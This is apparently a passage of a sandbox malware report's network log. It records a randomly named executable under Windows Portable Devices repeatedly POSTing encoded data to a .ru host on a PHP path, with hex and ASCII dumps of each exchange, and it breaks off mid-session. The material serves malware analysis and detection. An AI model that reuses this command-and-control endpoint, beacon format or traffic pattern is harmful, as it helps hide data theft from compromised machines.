                                                                                                                                75192.168.2.449986172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:21.330883026 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:48:21.686697960 CET1072OUTData Raw: 54 5e 5b 50 53 46 59 57 5d 56 5b 57 54 54 51 5f 58 52 58 50 5b 53 57 42 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: T^[PSFYW]V[WTTQ_XRXP[SWBVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["$[49\!>,%=Y5;$(+Q#%+' 2>*+=<X&*!^&%X*
                                                                                                                                Jan 1, 2025 21:48:21.775507927 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:22.041657925 CET809INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:21 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aaR56CGkgv6Fv4V62aLWZOOXesgANtMVX9g%2F%2F2pVacphgzvtEKNAVZt8IhK98sAwoir0%2FqFLkmpEY9a%2FyC02hQu62YDNiXiKplOvDA5AY09aY69v07gOx2yU%2FDCg61mclKfLEf0B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55ea7cc18429e-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2427&min_rtt=2055&rtt_var=1516&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=289855&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                76192.168.2.449992172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:22.171600103 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:22.530476093 CET1072OUTData Raw: 51 52 5e 50 56 47 5c 55 5d 56 5b 57 54 5b 51 5d 58 57 58 5b 5b 55 57 49 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QR^PVG\U]V[WT[Q]XWX[[UWIVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!0?42"5;]0=45#(B+Q!%8R0 2=%*>=8^1!^&%X*
                                                                                                                                Jan 1, 2025 21:48:22.615510941 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:22.795046091 CET809INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:22 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pyTQr7Zw5AStA%2FN6foJ6JuykgFUxCOX3opTk1uQrtAXqmPMDMQjh1A7QtB%2Fp1h%2FEzav2w70iIkjCZDuOUP5uwEKednTT6%2BhIaVx%2FUlTahwfZ2KCJBgKxFSluJE04RQSlXUDUT4RW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55ead09dc183d-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2460&min_rtt=1609&rtt_var=2305&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=173437&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                77192.168.2.449998172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:22.921646118 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:23.280643940 CET1072OUTData Raw: 54 52 5e 50 53 43 59 5e 5d 56 5b 57 54 59 51 5d 58 51 58 5d 5b 5e 57 45 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TR^PSCY^]V[WTYQ]XQX][^WEVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["'1?[71.!?\3>'5;?S?47V"8W3V-)6(<_&!^&%X*3
                                                                                                                                Jan 1, 2025 21:48:23.387042046 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:23.647599936 CET806INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:23 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WLi%2BEc9xonlodfmxde6ays84nshC3vi8F0gC9kkBkbOCEiIi%2F56j6vpO78CISm5XpP%2FUqKBu%2B1OHGh0qhTAnmhyjWg6ATF8YcyU3X5CblVsTCtbTfECwqscSr4UZq3GDCfhjmhgB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55eb1db866a4e-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4850&min_rtt=2156&rtt_var=6197&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=61572&cwnd=201&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                78192.168.2.450004172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:23.910115004 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:24.264970064 CET1072OUTData Raw: 51 56 5e 52 56 4a 59 54 5d 56 5b 57 54 54 51 52 58 5d 58 51 5b 57 57 45 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QV^RVJYT]V[WTTQRX]XQ[WWEVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!['3^7215>$08^";'R?485$T$0[(&@<+2*!^&%X*
                                                                                                                                Jan 1, 2025 21:48:24.364288092 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:24.654026031 CET809INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:24 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kpvvFQbgoTL6VC16csXQgCMI6MSLBWyy3%2BpbOGALlM%2FVrid8HGY56w4O2ykpWIwJ1eDixL9N3MbJF5gG9uqpcGXo4AJ23SxQS61wQ6sDxr4JzV%2BEadCoNmXSVvePCT%2FU%2FDsvFgNh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55eb7fff4437a-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2971&min_rtt=1584&rtt_var=3368&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=115114&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                79192.168.2.450015172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:24.783849001 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1064
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:25.139825106 CET1064OUTData Raw: 51 56 5b 50 53 43 59 5e 5d 56 5b 57 54 5c 51 5e 58 56 58 5a 5b 53 57 47 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QV[PSCY^]V[WT\Q^XVXZ[SWGVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!Z'T 7!8%>$";<<+V6%(30**(=#&!^&%X*3
                                                                                                                                Jan 1, 2025 21:48:25.255770922 CET25INHTTP/1.1 100 Continue


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                80192.168.2.450016172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:25.273418903 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1788
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:25.624209881 CET1788OUTData Raw: 54 53 5b 51 53 47 5c 53 5d 56 5b 57 54 5b 51 52 58 56 58 59 5b 52 57 44 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TS[QSG\S]V[WT[QRXVXY[RWDVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!$(#9\"7\'.35+(?!5$36X(65(X+'*!^&%X*
                                                                                                                                Jan 1, 2025 21:48:25.717118025 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:26.137073994 CET957INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:26 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yaaAkEtSVyzUMTHmFQZTTgrTgqWhNbevw3hs%2FCLQgHihdA5f1V70RbUolbVOWAqtFkJ9LHnON8mxr5C7t%2BikFS0JusvPrrWbZN%2FNmQfO83THLOk6u%2FeX%2BJSSkqdpqGi1ohvojVcW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55ec06d8f426a-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3585&min_rtt=1636&rtt_var=4511&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2133&delivery_rate=84745&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 02 1e 21 11 3f 1f 33 54 34 32 03 1e 2a 38 0a 02 26 21 08 12 31 33 2a 18 28 01 20 05 2b 3c 27 0d 26 3c 24 19 27 5c 36 0e 3c 32 0e 5b 29 0c 20 5c 05 1b 39 5d 24 17 3b 11 26 3b 0f 1d 3d 30 30 5f 37 06 31 02 28 30 3f 08 21 38 21 10 26 06 39 54 33 3a 2a 55 29 2c 23 5c 29 30 01 1f 26 2d 2a 51 0f 16 38 1f 3e 1e 25 00 29 3c 28 5b 27 08 28 11 35 43 25 55 32 3b 2f 57 24 3a 2d 02 29 2e 3f 56 21 33 0e 0e 25 2f 22 5b 26 10 23 50 3a 10 26 5e 20 01 22 53 02 3f 55 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98!?3T42*8&!13*( +<'&<$'\6<2[) \9]$;&;=00_71(0?!8!&9T3:*U),#\)0&-*Q8>%)<(['(5C%U2;/W$:-).?V!3%/"[&#P:&^ "S?UV0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                81192.168.2.450017172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:25.392644882 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:25.749278069 CET1072OUTData Raw: 51 55 5b 57 53 40 5c 51 5d 56 5b 57 54 54 51 5f 58 50 58 58 5b 51 57 44 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QU[WS@\Q]V[WTTQ_XPXX[QWDVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!03"2."Z$[+5V+'$!%8T$0&>@!C+0&!^&%X*
                                                                                                                                Jan 1, 2025 21:48:25.838979959 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:26.097963095 CET807INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:26 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BzRXfirnJ29WkPl9NB55YTpeY%2FC4zafSZZy5XUXYKWH4Bz7Y2TMcEaGp2GSC5%2BXLYMY9p74ahDPNdlYM9KlGbecvuebwdYeJtEMgCcmF%2F56RVV9ARxjj9IJ95Ac%2F4Qr2fkbDP0h9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55ec138857280-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2158&min_rtt=1896&rtt_var=1236&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=365091&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                82192.168.2.450028172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:26.777942896 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:48:27.142849922 CET1072OUTData Raw: 54 5e 5b 56 53 46 5c 52 5d 56 5b 57 54 5e 51 5d 58 55 58 51 5b 56 57 43 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: T^[VSF\R]V[WT^Q]XUXQ[VWCVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!_&1;4=">+Z'4_!7U(4#P5/301>&5E(+2:!^&%X*/
                                                                                                                                Jan 1, 2025 21:48:27.226285934 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:27.406779051 CET802INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:27 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pKaE%2FjFDEh%2BosrqbIBhkravfmuT4MCAXwrg6lJqnodYCv6aDq4166I7St%2F3bCkb3Er0IEkU8qrVXLM8cvsZaIjijEEHZa00eil3B6P0IgATeWXF%2B3VRiZNSRFfNOymqqxSmUpbQU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55ec9dd894231-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2854&min_rtt=1725&rtt_var=2905&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=135700&cwnd=126&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a
                                                                                                                                Data Ascii: 40VX[
                                                                                                                                Jan 1, 2025 21:48:27.493978024 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0
                                                                                                                                Jan 1, 2025 21:48:27.725733995 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                83192.168.2.450034172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:27.726341963 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1064
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:48:28.077461004 CET1064OUTData Raw: 51 55 5b 55 53 44 5c 54 5d 56 5b 57 54 5c 51 52 58 55 58 5b 5b 5f 57 42 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QU[USD\T]V[WT\QRXUX[[_WBVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["$1#Y""=5-8$>4^"8#V+$#P!68W$3:[)&=E?- Y&!^&%X*
                                                                                                                                Jan 1, 2025 21:48:28.178814888 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:28.385804892 CET802INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:28 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=REIPxIJTZRZvS34IMsTUcxLTsZ25xoPvmArpKMLkg0rLU%2Ftbupd8tZN4DhzDc8GuUzxyiUikwkCqpNdwmYCj7GtwLQSrcaYQ8iVSZ2AFhKQGNgQhaauFTQsBHPIfdYU6dXXiP%2BEa"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55ecfc99fc354-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4690&min_rtt=1629&rtt_var=6733&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1385&delivery_rate=55898&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                84192.168.2.450040172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:28.523046017 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
